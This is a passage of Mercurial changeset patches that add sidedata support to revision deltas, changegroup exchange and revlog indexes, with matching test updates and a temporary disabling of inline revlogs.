# Flags not yet supported. 0, + # Sidedata not yet supported. + {}, ) progress.increment() @@ -719,6 +725,8 @@ delta, # Flags not yet supported. 0, + # Sidedata not yet supported. + {}, ) progress.increment() diff --git a/mercurial/localrepo.py b/mercurial/localrepo.py --- a/mercurial/localrepo.py +++ b/mercurial/localrepo.py @@ -316,7 +316,13 @@ ) def getbundle( - self, source, heads=None, common=None, bundlecaps=None, **kwargs + self, + source, + heads=None, + common=None, + bundlecaps=None, + remote_sidedata=None, + **kwargs ): chunks = exchange.getbundlechunks( self._repo, @@ -324,6 +330,7 @@ heads=heads, common=common, bundlecaps=bundlecaps, + remote_sidedata=remote_sidedata, **kwargs )[1] cb = util.chunkbuffer(chunks) diff --git a/mercurial/revlog.py b/mercurial/revlog.py --- a/mercurial/revlog.py +++ b/mercurial/revlog.py @@ -2527,7 +2527,7 @@ deltacomputer = deltautil.deltacomputer(self) # loop through our set of deltas for data in deltas: - node, p1, p2, linknode, deltabase, delta, flags = data + node, p1, p2, linknode, deltabase, delta, flags, sidedata = data link = linkmapper(linknode) flags = flags or REVIDX_DEFAULT_FLAGS diff --git a/tests/test-check-interfaces.py b/tests/test-check-interfaces.py --- a/tests/test-check-interfaces.py +++ b/tests/test-check-interfaces.py @@ -276,6 +276,7 @@ flags=b'', baserevisionsize=None, revision=b'', + sidedata=b'', delta=None, ) checkzobject(rd) diff --git a/tests/test-revlog-raw.py b/tests/test-revlog-raw.py --- a/tests/test-revlog-raw.py +++ b/tests/test-revlog-raw.py @@ -147,6 +147,7 @@ b'flags': rlog.flags(r), b'deltabase': rlog.node(deltaparent), b'delta': rlog.revdiff(deltaparent, r), + b'sidedata': rlog.sidedata(r), } def deltaiter(self): @@ -159,10 +160,11 @@ deltabase = chunkdata[b'deltabase'] delta = chunkdata[b'delta'] flags = chunkdata[b'flags'] + sidedata = chunkdata[b'sidedata'] chain = node - yield (node, p1, p2, cs, deltabase, delta, flags) + yield (node, p1, p2, cs, deltabase, delta, flags, sidedata) def linkmap(lnode): return rlog.rev(lnode) # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1613668715 -3600 # Thu Feb 18 18:18:35 2021 +0100 # Node ID e8c11a2c96c0b971cefcbd2efbbddb6dc92a5886 # Parent a41565bef69f7e0224a15dff8f381f1a77d0da66 delta: add sidedata field to revision delta When emitting revision delta, we need to also emit the sidedata information just added in the revlogv2 format if appropriate. Differential Revision: https://phab.mercurial-scm.org/D10027 diff --git a/hgext/sqlitestore.py b/hgext/sqlitestore.py --- a/hgext/sqlitestore.py +++ b/hgext/sqlitestore.py @@ -288,6 +288,7 @@ baserevisionsize = attr.ib() revision = attr.ib() delta = attr.ib() + sidedata = attr.ib() linknode = attr.ib(default=None) @@ -908,6 +909,10 @@ def files(self): return [] + def sidedata(self, nodeorrev, _df=None): + # Not supported for now + return {} + def storageinfo( self, exclusivefiles=False, diff --git a/mercurial/changegroup.py b/mercurial/changegroup.py --- a/mercurial/changegroup.py +++ b/mercurial/changegroup.py @@ -618,6 +618,13 @@ yield prefix yield data + sidedata = delta.sidedata + if sidedata is not None: + # Need a separate chunk for sidedata to be able to differentiate + # "raw delta" length and sidedata length + yield chunkheader(len(sidedata)) + yield sidedata + def _sortnodesellipsis(store, nodes, cl, lookup): """Sort nodes for changegroup generation.""" diff --git a/mercurial/interfaces/repository.py b/mercurial/interfaces/repository.py --- a/mercurial/interfaces/repository.py +++ b/mercurial/interfaces/repository.py @@ -453,6 +453,10 @@ """ ) + sidedata = interfaceutil.Attribute( + """Raw sidedata bytes for the given revision.""" + ) + class ifilerevisionssequence(interfaceutil.Interface): """Contains index data for all revisions of a file. diff --git a/mercurial/revlog.py b/mercurial/revlog.py --- a/mercurial/revlog.py +++ b/mercurial/revlog.py @@ -204,6 +204,7 @@ baserevisionsize = attr.ib() revision = attr.ib() delta = attr.ib() + sidedata = attr.ib() linknode = attr.ib(default=None) @@ -2587,6 +2588,7 @@ dfh, alwayscache=alwayscache, deltacomputer=deltacomputer, + sidedata=sidedata, ) if addrevisioncb: diff --git a/mercurial/testing/storage.py b/mercurial/testing/storage.py --- a/mercurial/testing/storage.py +++ b/mercurial/testing/storage.py @@ -1158,7 +1158,7 @@ f = self._makefilefn() deltas = [ - (node0, nullid, nullid, nullid, nullid, delta0, 0), + (node0, nullid, nullid, nullid, nullid, delta0, 0, {}), ] with self._maketransactionfn() as tr: @@ -1214,7 +1214,9 @@ for i, fulltext in enumerate(fulltexts): delta = mdiff.trivialdiffheader(len(fulltext)) + fulltext - deltas.append((nodes[i], nullid, nullid, nullid, nullid, delta, 0)) + deltas.append( + (nodes[i], nullid, nullid, nullid, nullid, delta, 0, {}) + ) with self._maketransactionfn() as tr: newnodes = [] @@ -1262,7 +1264,9 @@ ) delta = mdiff.textdiff(b'bar\n' * 30, (b'bar\n' * 30) + b'baz\n') - deltas = [(b'\xcc' * 20, node1, nullid, b'\x01' * 20, node1, delta, 0)] + deltas = [ + (b'\xcc' * 20, node1, nullid, b'\x01' * 20, node1, delta, 0, {}) + ] with self._maketransactionfn() as tr: with self.assertRaises(error.CensoredBaseError): diff --git a/mercurial/utils/storageutil.py b/mercurial/utils/storageutil.py --- a/mercurial/utils/storageutil.py +++ b/mercurial/utils/storageutil.py @@ -478,6 +478,7 @@ baserevisionsize=baserevisionsize, revision=revision, delta=delta, + sidedata=sidedata, ) prevrev = rev # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1613728407 -3600 # Fri Feb 19 10:53:27 2021 +0100 # Node ID bc2519513ae06df0107b5cbacafbd8b8d1b4fc6c # Parent e8c11a2c96c0b971cefcbd2efbbddb6dc92a5886 sidedata-exchange: add `wanted_sidedata` and `sidedata_computers` to repos Each repo will advertise the sidedata categories it requires (categories being unique and canonical), and have a set of "computers", functions to generate sidedata from `(repo, revlog, rev, previous_sidedata)`, for a given category. The set of computers can be a superset of the set of the wanted categories, but not smaller: repos are expected to be coherent in their handling of sidedata. Differential Revision: https://phab.mercurial-scm.org/D10028 diff --git a/mercurial/bundle2.py b/mercurial/bundle2.py --- a/mercurial/bundle2.py +++ b/mercurial/bundle2.py @@ -1812,6 +1812,28 @@ return params +def format_remote_wanted_sidedata(repo): + """Formats a repo's wanted sidedata categories into a bytestring for + capabilities exchange.""" + wanted = b"" + if repo._wanted_sidedata: + wanted = b','.join( + pycompat.bytestr(c) for c in sorted(repo._wanted_sidedata) + ) + return wanted + + +def read_remote_wanted_sidedata(remote): + sidedata_categories = remote.capable(b'exp-wanted-sidedata') + return read_wanted_sidedata(sidedata_categories) + + +def read_wanted_sidedata(formatted): + if formatted: + return set(formatted.split(b',')) + return set() + + def addpartbundlestream2(bundler, repo, **kwargs): if not kwargs.get('stream', False): return @@ -1957,6 +1979,7 @@ b'version', b'nbchanges', b'exp-sidedata', + b'exp-wanted-sidedata', b'treemanifest', b'targetphase', ), @@ -1999,6 +2022,10 @@ targetphase = inpart.params.get(b'targetphase') if targetphase is not None: extrakwargs['targetphase'] = int(targetphase) + + remote_sidedata = inpart.params.get(b'exp-wanted-sidedata') + extrakwargs['sidedata_categories'] = read_wanted_sidedata(remote_sidedata) + ret = _processchangegroup( op, cg, @@ -2559,5 +2586,7 @@ part.addparam(b'treemanifest', b'1') if b'exp-sidedata-flag' in repo.requirements: part.addparam(b'exp-sidedata', b'1') + wanted = format_remote_wanted_sidedata(repo) + part.addparam(b'exp-wanted-sidedata', wanted) return bundler diff --git a/mercurial/changegroup.py b/mercurial/changegroup.py --- a/mercurial/changegroup.py +++ b/mercurial/changegroup.py @@ -945,6 +945,9 @@ if bundlecaps is None: bundlecaps = set() self._bundlecaps = bundlecaps + if remote_sidedata is None: + remote_sidedata = set() + self._remote_sidedata = remote_sidedata self._isshallow = shallow self._fullclnodes = fullnodes diff --git a/mercurial/exchange.py b/mercurial/exchange.py --- a/mercurial/exchange.py +++ b/mercurial/exchange.py @@ -420,7 +420,20 @@ b'unbundle wire protocol command' ) ) - + for category in sorted(bundle2.read_remote_wanted_sidedata(pushop.remote)): + # Check that a computer is registered for that category for at least + # one revlog kind. + for kind, computers in repo._sidedata_computers.items(): + if computers.get(category): + break + else: + raise error.Abort( + _( + b'cannot push: required sidedata category not supported' + b" by this client: '%s'" + ) + % pycompat.bytestr(category) + ) # get lock as we might write phase data wlock = lock = None try: @@ -865,8 +878,15 @@ if not cgversions: raise error.Abort(_(b'no common changegroup version')) version = max(cgversions) + + remote_sidedata = bundle2.read_remote_wanted_sidedata(pushop.remote) cgstream = changegroup.makestream( - pushop.repo, pushop.outgoing, version, b'push' + pushop.repo, + pushop.outgoing, + version, + b'push', + bundlecaps=b2caps, + remote_sidedata=remote_sidedata, ) cgpart = bundler.newpart(b'changegroup', data=cgstream) if cgversions: @@ -1607,6 +1627,23 @@ ) % (b', '.join(sorted(missing))) raise error.Abort(msg) + for category in repo._wanted_sidedata: + # Check that a computer is registered for that category for at least + # one revlog kind. + for kind, computers in repo._sidedata_computers.items(): + if computers.get(category): + break + else: + # This should never happen since repos are supposed to be able to + # generate the sidedata they require. + raise error.ProgrammingError( + _( + b'sidedata category requested by local side without local' + b"support: '%s'" + ) + % pycompat.bytestr(category) + ) + pullop.trmanager = transactionmanager(repo, b'pull', remote.url()) wlock = util.nullcontextmanager() if not bookmod.bookmarksinstore(repo): @@ -1820,6 +1857,10 @@ pullop.stepsdone.add(b'obsmarkers') _pullbundle2extraprepare(pullop, kwargs) + remote_sidedata = bundle2.read_remote_wanted_sidedata(pullop.remote) + if remote_sidedata: + kwargs[b'remote_sidedata'] = remote_sidedata + with pullop.remote.commandexecutor() as e: args = dict(kwargs) args[b'source'] = b'pull' @@ -2388,6 +2429,8 @@ if b'exp-sidedata-flag' in repo.requirements: part.addparam(b'exp-sidedata', b'1') + sidedata = bundle2.format_remote_wanted_sidedata(repo) + part.addparam(b'exp-wanted-sidedata', sidedata) if ( kwargs.get('narrow', False) diff --git a/mercurial/interfaces/repository.py b/mercurial/interfaces/repository.py --- a/mercurial/interfaces/repository.py +++ b/mercurial/interfaces/repository.py @@ -1832,6 +1832,12 @@ def savecommitmessage(text): pass + def register_sidedata_computer(kind, category, keys, computer): + pass + + def register_wanted_sidedata(category): + pass + class completelocalrepository( ilocalrepositorymain, ilocalrepositoryfilestorage diff --git a/mercurial/localrepo.py b/mercurial/localrepo.py --- a/mercurial/localrepo.py +++ b/mercurial/localrepo.py @@ -49,6 +49,7 @@ match as matchmod, mergestate as mergestatemod, mergeutil, + metadata as metadatamod, namespaces, narrowspec, obsolete, @@ -273,6 +274,11 @@ caps = moderncaps.copy() self._repo = repo.filtered(b'served') self.ui = repo.ui + + if repo._wanted_sidedata: + formatted = bundle2.format_remote_wanted_sidedata(repo) + caps.add(b'exp-wanted-sidedata=' + formatted) + self._caps = repo._restrictcapabilities(caps) # Begin of _basepeer interface. @@ -1395,6 +1401,10 @@ if requirementsmod.COPIESSDC_REQUIREMENT in self.requirements: self.filecopiesmode = b'changeset-sidedata' + self._wanted_sidedata = set() + self._sidedata_computers = {} + metadatamod.set_sidedata_spec_for_repo(self) + def _getvfsward(self, origfunc): """build a ward for self.vfs""" rref = weakref.ref(self) @@ -3332,6 +3342,22 @@ fp.close() return self.pathto(fp.name[len(self.root) + 1 :]) + def register_wanted_sidedata(self, category): + self._wanted_sidedata.add(pycompat.bytestr(category)) + + def register_sidedata_computer(self, kind, category, keys, computer): + if kind not in (b"changelog", b"manifest", b"filelog"): + msg = _(b"unexpected revlog kind '%s'.") + raise error.ProgrammingError(msg % kind) + category = pycompat.bytestr(category) + if category in self._sidedata_computers.get(kind, []): + msg = _( + b"cannot register a sidedata computer twice for category '%s'." + ) + raise error.ProgrammingError(msg % category) + self._sidedata_computers.setdefault(kind, {}) + self._sidedata_computers[kind][category] = (keys, computer) + # used to avoid circular references so destructors work def aftertrans(files): diff --git a/mercurial/metadata.py b/mercurial/metadata.py --- a/mercurial/metadata.py +++ b/mercurial/metadata.py @@ -18,6 +18,7 @@ from . import ( error, pycompat, + requirements as requirementsmod, util, ) @@ -804,6 +805,21 @@ return encode_files_sidedata(files), files.has_copies_info +def copies_sidedata_computer(repo, revlog, rev, existing_sidedata): + return _getsidedata(repo, rev)[0] + + +def set_sidedata_spec_for_repo(repo): + if requirementsmod.COPIESSDC_REQUIREMENT in repo.requirements: + repo.register_wanted_sidedata(sidedatamod.SD_FILES) + repo.register_sidedata_computer( + b"changelog", + sidedatamod.SD_FILES, + (sidedatamod.SD_FILES,), + copies_sidedata_computer, + ) + + def getsidedataadder(srcrepo, destrepo): use_w = srcrepo.ui.configbool(b'experimental', b'worker.repository-upgrade') if pycompat.iswindows or not use_w: diff --git a/mercurial/statichttprepo.py b/mercurial/statichttprepo.py --- a/mercurial/statichttprepo.py +++ b/mercurial/statichttprepo.py @@ -172,6 +172,7 @@ self.names = namespaces.namespaces() self.filtername = None self._extrafilterid = None + self._wanted_sidedata = set() try: requirements = set(self.vfs.read(b'requires').splitlines()) diff --git a/tests/test-check-interfaces.py b/tests/test-check-interfaces.py --- a/tests/test-check-interfaces.py +++ b/tests/test-check-interfaces.py @@ -85,6 +85,7 @@ class dummyrepo(object): def __init__(self): self.ui = uimod.ui() + self._wanted_sidedata = set() def filtered(self, name): pass # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1615401198 -3600 # Wed Mar 10 19:33:18 2021 +0100 # Node ID f63299ee7e4d9bc817dac2edeae7725766dbd0cc # Parent bc2519513ae06df0107b5cbacafbd8b8d1b4fc6c revlog: add attribute on revlogs that specifies its kind The sidedata logic needs to check whether the revlog it's working on is a changelog, a manifest or a filelog. Furthermore, future versions of the revlog format will most likely see a split between the three types (i.e. they will store different information), so having this will be useful for other future endeavors as well. Differential Revision: https://phab.mercurial-scm.org/D10151 diff --git a/mercurial/changelog.py b/mercurial/changelog.py --- a/mercurial/changelog.py +++ b/mercurial/changelog.py @@ -428,6 +428,7 @@ self._filteredrevs = frozenset() self._filteredrevs_hashcache = {} self._copiesstorage = opener.options.get(b'copies-storage') + self.revlog_kind = b'changelog' @property def filteredrevs(self): diff --git a/mercurial/filelog.py b/mercurial/filelog.py --- a/mercurial/filelog.py +++ b/mercurial/filelog.py @@ -32,6 +32,7 @@ # Full name of the user visible file, relative to the repository root. # Used by LFS. self._revlog.filename = path + self._revlog.revlog_kind = b'filelog' def __len__(self): return len(self._revlog) diff --git a/mercurial/manifest.py b/mercurial/manifest.py --- a/mercurial/manifest.py +++ b/mercurial/manifest.py @@ -1610,6 +1610,7 @@ self.index = self._revlog.index self.version = self._revlog.version self._generaldelta = self._revlog._generaldelta + self._revlog.revlog_kind = b'manifest' def _setupmanifestcachehooks(self, repo): """Persist the manifestfulltextcache on lock release""" # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1613729742 -3600 # Fri Feb 19 11:15:42 2021 +0100 # Node ID 45f0d52976983e5fb7434c0d4630bbed0c34401b # Parent f63299ee7e4d9bc817dac2edeae7725766dbd0cc changegroupv4: add sidedata helpers These helpers carry the information and computers needed to rewrite sidedata when generating/applying patches. We will be making use of them soon. Differential Revision: https://phab.mercurial-scm.org/D10029 diff --git a/hgext/sqlitestore.py b/hgext/sqlitestore.py --- a/hgext/sqlitestore.py +++ b/hgext/sqlitestore.py @@ -587,6 +587,7 @@ revisiondata=False, assumehaveparentrevisions=False, deltamode=repository.CG_DELTAMODE_STD, + sidedata_helpers=None, ): if nodesorder not in (b'nodes', b'storage', b'linear', None): raise error.ProgrammingError( @@ -625,6 +626,7 @@ revisiondata=revisiondata, assumehaveparentrevisions=assumehaveparentrevisions, deltamode=deltamode, + sidedata_helpers=sidedata_helpers, ): yield delta diff --git a/mercurial/changegroup.py b/mercurial/changegroup.py --- a/mercurial/changegroup.py +++ b/mercurial/changegroup.py @@ -272,6 +272,7 @@ url, targetphase=phases.draft, expectedtotal=None, + sidedata_categories=None, ): """Add the changegroup returned by source.read() to this repo. srctype is a string like 'push', 'pull', or 'unbundle'. url is @@ -282,9 +283,23 @@ - more heads than before: 1+added heads (2..n) - fewer heads than before: -1-removed heads (-2..-n) - number of heads stays the same: 1 + + `sidedata_categories` is an optional set of the remote's sidedata wanted + categories. """ repo = repo.unfiltered() + # Only useful if we're adding sidedata categories. If both peers have + # the same categories, then we simply don't do anything. + if self.version == b'04' and srctype == b'pull': + sidedata_helpers = get_sidedata_helpers( + repo, + sidedata_categories or set(), + pull=True, + ) + else: + sidedata_helpers = None + def csmap(x): repo.ui.debug(b"add changeset %s\n" % short(x)) return len(cl) @@ -749,6 +764,7 @@ clrevtolocalrev=None, fullclnodes=None, precomputedellipsis=None, + sidedata_helpers=None, ): """Calculate deltas for a set of revisions. @@ -756,6 +772,8 @@ If topic is not None, progress detail will be generated using this topic name (e.g. changesets, manifests, etc). + + See `storageutil.emitrevisions` for the doc on `sidedata_helpers`. """ if not nodes: return @@ -854,6 +872,7 @@ revisiondata=True, assumehaveparentrevisions=not ellipses, deltamode=deltamode, + sidedata_helpers=sidedata_helpers, ) for i, revision in enumerate(revisions): @@ -974,8 +993,21 @@ self._verbosenote(_(b'uncompressed size of bundle content:\n')) size = 0 + sidedata_helpers = None + if self.version == b'04': + remote_sidedata = self._remote_sidedata + if source == b'strip': + # We're our own remote when stripping, get the no-op helpers + # TODO a better approach would be for the strip bundle to + # correctly advertise its sidedata categories directly. + remote_sidedata = repo._wanted_sidedata + sidedata_helpers = get_sidedata_helpers(repo, remote_sidedata) + clstate, deltas = self._generatechangelog( - cl, clnodes, generate=changelog + cl, + clnodes, + generate=changelog, + sidedata_helpers=sidedata_helpers, ) for delta in deltas: for chunk in _revisiondeltatochunks(delta, self._builddeltaheader): @@ -1023,6 +1055,7 @@ fnodes, source, clstate[b'clrevtomanifestrev'], + sidedata_helpers=sidedata_helpers, ) for tree, deltas in it: @@ -1063,6 +1096,7 @@ fastpathlinkrev, fnodes, clrevs, + sidedata_helpers=sidedata_helpers, ) for path, deltas in it: @@ -1087,7 +1121,9 @@ if clnodes: repo.hook(b'outgoing', node=hex(clnodes[0]), source=source) - def _generatechangelog(self, cl, nodes, generate=True): + def _generatechangelog( + self, cl, nodes, generate=True, sidedata_helpers=None + ): """Generate data for changelog chunks. Returns a 2-tuple of a dict containing state and an iterable of @@ -1096,6 +1132,8 @@ if generate is False, the state will be fully populated and no chunk stream will be yielded + + See `storageutil.emitrevisions` for the doc on `sidedata_helpers`. """ clrevorder = {} manifests = {} @@ -1179,6 +1217,7 @@ clrevtolocalrev={}, fullclnodes=self._fullclnodes, precomputedellipsis=self._precomputedellipsis, + sidedata_helpers=sidedata_helpers, ) return state, gen @@ -1192,11 +1231,14 @@ fnodes, source, clrevtolocalrev, + sidedata_helpers=None, ): """Returns an iterator of changegroup chunks containing manifests. `source` is unused here, but is used by extensions like remotefilelog to change what is sent based in pulls vs pushes, etc. + + See `storageutil.emitrevisions` for the doc on `sidedata_helpers`. """ repo = self._repo mfl = repo.manifestlog @@ -1285,6 +1327,7 @@ clrevtolocalrev=clrevtolocalrev, fullclnodes=self._fullclnodes, precomputedellipsis=self._precomputedellipsis, + sidedata_helpers=sidedata_helpers, ) if not self._oldmatcher.visitdir(store.tree[:-1]): @@ -1323,6 +1366,7 @@ fastpathlinkrev, fnodes, clrevs, + sidedata_helpers=None, ): changedfiles = [ f @@ -1417,6 +1461,7 @@ clrevtolocalrev=clrevtolocalrev, fullclnodes=self._fullclnodes, precomputedellipsis=self._precomputedellipsis, + sidedata_helpers=sidedata_helpers, ) yield fname, deltas @@ -1792,3 +1837,25 @@ ) return revisions, files + + +def get_sidedata_helpers(repo, remote_sd_categories, pull=False): + # Computers for computing sidedata on-the-fly + sd_computers = collections.defaultdict(list) + # Computers for categories to remove from sidedata + sd_removers = collections.defaultdict(list) + + to_generate = remote_sd_categories - repo._wanted_sidedata + to_remove = repo._wanted_sidedata - remote_sd_categories + if pull: + to_generate, to_remove = to_remove, to_generate + + for revlog_kind, computers in repo._sidedata_computers.items(): + for category, computer in computers.items(): + if category in to_generate: + sd_computers[revlog_kind].append(computer) + if category in to_remove: + sd_removers[revlog_kind].append(computer) + + sidedata_helpers = (repo, sd_computers, sd_removers) + return sidedata_helpers diff --git a/mercurial/filelog.py b/mercurial/filelog.py --- a/mercurial/filelog.py +++ b/mercurial/filelog.py @@ -103,6 +103,7 @@ revisiondata=False, assumehaveparentrevisions=False, deltamode=repository.CG_DELTAMODE_STD, + sidedata_helpers=None, ): return self._revlog.emitrevisions( nodes, @@ -110,6 +111,7 @@ revisiondata=revisiondata, assumehaveparentrevisions=assumehaveparentrevisions, deltamode=deltamode, + sidedata_helpers=sidedata_helpers, ) def addrevision( diff --git a/mercurial/manifest.py b/mercurial/manifest.py --- a/mercurial/manifest.py +++ b/mercurial/manifest.py @@ -1826,6 +1826,7 @@ revisiondata=False, assumehaveparentrevisions=False, deltamode=repository.CG_DELTAMODE_STD, + sidedata_helpers=None, ): return self._revlog.emitrevisions( nodes, @@ -1833,6 +1834,7 @@ revisiondata=revisiondata, assumehaveparentrevisions=assumehaveparentrevisions, deltamode=deltamode, + sidedata_helpers=sidedata_helpers, ) def addgroup( diff --git a/mercurial/revlog.py b/mercurial/revlog.py --- a/mercurial/revlog.py +++ b/mercurial/revlog.py @@ -2733,6 +2733,7 @@ revisiondata=False, assumehaveparentrevisions=False, deltamode=repository.CG_DELTAMODE_STD, + sidedata_helpers=None, ): if nodesorder not in (b'nodes', b'storage', b'linear', None): raise error.ProgrammingError( @@ -2761,6 +2762,7 @@ deltamode=deltamode, revisiondata=revisiondata, assumehaveparentrevisions=assumehaveparentrevisions, + sidedata_helpers=sidedata_helpers, ) DELTAREUSEALWAYS = b'always' diff --git a/mercurial/utils/storageutil.py b/mercurial/utils/storageutil.py --- a/mercurial/utils/storageutil.py +++ b/mercurial/utils/storageutil.py @@ -23,6 +23,7 @@ pycompat, ) from ..interfaces import repository +from ..revlogutils import sidedata as sidedatamod from ..utils import hashutil _nullhash = hashutil.sha1(nullid) @@ -294,6 +295,7 @@ deltamode=repository.CG_DELTAMODE_STD, revisiondata=False, assumehaveparentrevisions=False, + sidedata_helpers=None, ): """Generic implementation of ifiledata.emitrevisions(). @@ -356,6 +358,21 @@ ``nodesorder`` ``revisiondata`` ``assumehaveparentrevisions`` + ``sidedata_helpers`` (optional) + If not None, means that sidedata should be included. + A dictionary of revlog type to tuples of `(repo, computers, removers)`: + * `repo` is used as an argument for computers + * `computers` is a list of `(category, (keys, computer)` that + compute the missing sidedata categories that were asked: + * `category` is the sidedata category + * `keys` are the sidedata keys to be affected + * `computer` is the function `(repo, store, rev, sidedata)` that + returns a new sidedata dict. + * `removers` will remove the keys corresponding to the categories + that are present, but not needed. + If both `computers` and `removers` are empty, sidedata are simply not + transformed. + Revlog types are `changelog`, `manifest` or `filelog`. """ fnode = store.node @@ -469,6 +486,17 @@ available.add(rev) + sidedata = None + if sidedata_helpers: + sidedata = store.sidedata(rev) + sidedata = run_sidedata_helpers( + store=store, + sidedata_helpers=sidedata_helpers, + sidedata=sidedata, + rev=rev, + ) + sidedata = sidedatamod.serialize_sidedata(sidedata) + yield resultcls( node=node, p1node=fnode(p1rev), @@ -484,6 +512,25 @@ prevrev = rev +def run_sidedata_helpers(store, sidedata_helpers, sidedata, rev): + """Returns the sidedata for the given revision after running through + the given helpers. + - `store`: the revlog this applies to (changelog, manifest, or filelog + instance) + - `sidedata_helpers`: see `storageutil.emitrevisions` + - `sidedata`: previous sidedata at the given rev, if any + - `rev`: affected rev of `store` + """ + repo, sd_computers, sd_removers = sidedata_helpers + kind = store.revlog_kind + for _keys, sd_computer in sd_computers.get(kind, []): + sidedata = sd_computer(repo, store, rev, sidedata) + for keys, _computer in sd_removers.get(kind, []): + for key in keys: + sidedata.pop(key, None) + return sidedata + + def deltaiscensored(delta, baserev, baselenfn): """Determine if a delta represents censored revision data. diff --git a/tests/simplestorerepo.py b/tests/simplestorerepo.py --- a/tests/simplestorerepo.py +++ b/tests/simplestorerepo.py @@ -446,6 +446,7 @@ revisiondata=False, assumehaveparentrevisions=False, deltamode=repository.CG_DELTAMODE_STD, + sidedata_helpers=None, ): # TODO this will probably break on some ordering options. nodes = [n for n in nodes if n != nullid] @@ -459,6 +460,7 @@ revisiondata=revisiondata, assumehaveparentrevisions=assumehaveparentrevisions, deltamode=deltamode, + sidedata_helpers=sidedata_helpers, ): yield delta # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1613729057 -3600 # Fri Feb 19 11:04:17 2021 +0100 # Node ID c8bb7b89179e8d0dc437fb04f94be8659a8cd7f3 # Parent 45f0d52976983e5fb7434c0d4630bbed0c34401b revlogv2: temporarily forbid inline revlogs See inline comments. I plan to fix the underlying issue before revlogv2 is stabilized. Differential Revision: https://phab.mercurial-scm.org/D10030 diff --git a/mercurial/revlog.py b/mercurial/revlog.py --- a/mercurial/revlog.py +++ b/mercurial/revlog.py @@ -639,7 +639,11 @@ % (flags >> 16, fmt, self.indexfile) ) - self._inline = versionflags & FLAG_INLINE_DATA + # There is a bug in the transaction handling when going from an + # inline revlog to a separate index and data file. Turn it off until + # it's fixed, since v2 revlogs sometimes get rewritten on exchange. + # See issue6485 + self._inline = False # generaldelta implied by version 2 revlogs. self._generaldelta = True # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1613383708 -3600 # Mon Feb 15 11:08:28 2021 +0100 # Node ID 502e795b55acdb9926e8a2daa9e1c64827e35ac0 # Parent c8bb7b89179e8d0dc437fb04f94be8659a8cd7f3 revlog-index: add `replace_sidedata_info` method During a `pull` operation where the server does not provide sidedata, the client that requires it should generate them on-the-fly. In the generic case, we need to wait for the changelog + manifests + filelogs to be added, since we don't know what the sidedata computers might need: this means rewriting the sidedata of index entries from within the pull transaction (and no further back) right after we've added them. Both Python and C implementations only allow for rewriting the sidedata offset and length for revs within the transaction where they were created. Differential Revision: https://phab.mercurial-scm.org/D10031 diff --git a/mercurial/cext/revlog.c b/mercurial/cext/revlog.c --- a/mercurial/cext/revlog.c +++ b/mercurial/cext/revlog.c @@ -458,6 +458,56 @@ Py_RETURN_NONE; } +/* Replace an existing index entry's sidedata offset and length with new ones. + This cannot be used outside of the context of sidedata rewriting, + inside the transaction that creates the given revision. */ +static PyObject *index_replace_sidedata_info(indexObject *self, PyObject *args) +{ + uint64_t sidedata_offset; + int rev; + Py_ssize_t sidedata_comp_len; + char *data; + #if LONG_MAX == 0x7fffffffL + const char *const sidedata_format = PY23("nKi", "nKi"); + #else + const char *const sidedata_format = PY23("nki", "nki"); + #endif + + if (self->hdrsize == v1_hdrsize || self->inlined) { + /* + There is a bug in the transaction handling when going from an + inline revlog to a separate index and data file. Turn it off until + it's fixed, since v2 revlogs sometimes get rewritten on exchange. + See issue6485. + */ + raise_revlog_error(); + return NULL; + } + + if (!PyArg_ParseTuple(args, sidedata_format, &rev, &sidedata_offset, + &sidedata_comp_len)) + return NULL; + + if (rev < 0 || rev >= index_length(self)) { + PyErr_SetString(PyExc_IndexError, "revision outside index"); + return NULL; + } + if (rev < self->length) { + PyErr_SetString( + PyExc_IndexError, + "cannot rewrite entries outside of this transaction"); + return NULL; + } + + /* Find the newly added node, offset from the "already on-disk" length */ + data = self->added + self->hdrsize * (rev - self->length); + putbe64(sidedata_offset, data + 64); + putbe32(sidedata_comp_len, data + 72); + + + Py_RETURN_NONE; +} + static PyObject *index_stats(indexObject *self) { PyObject *obj = PyDict_New(); @@ -2789,6 +2839,8 @@ "compute phases"}, {"reachableroots2", (PyCFunction)reachableroots2, METH_VARARGS, "reachableroots"}, + {"replace_sidedata_info", (PyCFunction)index_replace_sidedata_info, + METH_VARARGS, "replace an existing index entry with a new value"}, {"headrevs", (PyCFunction)index_headrevs, METH_VARARGS, "get head revisions"}, /* Can do filtering since 3.2 */ {"headrevsfiltered", (PyCFunction)index_headrevs, METH_VARARGS, diff --git a/mercurial/pure/parsers.py b/mercurial/pure/parsers.py --- a/mercurial/pure/parsers.py +++ b/mercurial/pure/parsers.py @@ -259,6 +259,27 @@ assert index_size == 96, index_size null_item = (0, 0, 0, -1, -1, -1, -1, nullid, 0, 0) + def replace_sidedata_info(self, i, sidedata_offset, sidedata_length): + """ + Replace an existing index entry's sidedata offset and length with new + ones. + This cannot be used outside of the context of sidedata rewriting, + inside the transaction that creates the revision `i`. + """ + if i < 0: + raise KeyError + self._check_index(i) + sidedata_format = b">Qi" + packed_size = struct.calcsize(sidedata_format) + if i >= self._lgt: + packed = _pack(sidedata_format, sidedata_offset, sidedata_length) + old = self._extra[i - self._lgt] + new = old[:64] + packed + old[64 + packed_size :] + self._extra[i - self._lgt] = new + else: + msg = b"cannot rewrite entries outside of this transaction" + raise KeyError(msg) + class IndexObject2(Index2Mixin, IndexObject): pass # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1613730290 -3600 # Fri Feb 19 11:24:50 2021 +0100 # Node ID ba8e508a8e69284b70c857c616a299887770ef83 # Parent 502e795b55acdb9926e8a2daa9e1c64827e35ac0 sidedata-exchange: rewrite sidedata on-the-fly whenever possible When a A exchanges with B, the difference of their supported sidedata categories is made, and the responsibility is always with the client to generated it: - If A pushes to B and B requires category `foo` that A does not have, A will need to generate it when sending it to B. - If A pulls from B and A needs category `foo`, it will generate `foo` before the end of the transaction. - Any category that is not required is removed. If peers are not compatible, abort. It is forbidden to rewrite sidedata for a rev that already has sidedata, since that would introduce unreachable (garbage) data in the data file, something we're not prepared for yet. Differential Revision: https://phab.mercurial-scm.org/D10032 diff --git a/mercurial/changegroup.py b/mercurial/changegroup.py --- a/mercurial/changegroup.py +++ b/mercurial/changegroup.py @@ -7,6 +7,7 @@ from __future__ import absolute_import +import collections import os import struct 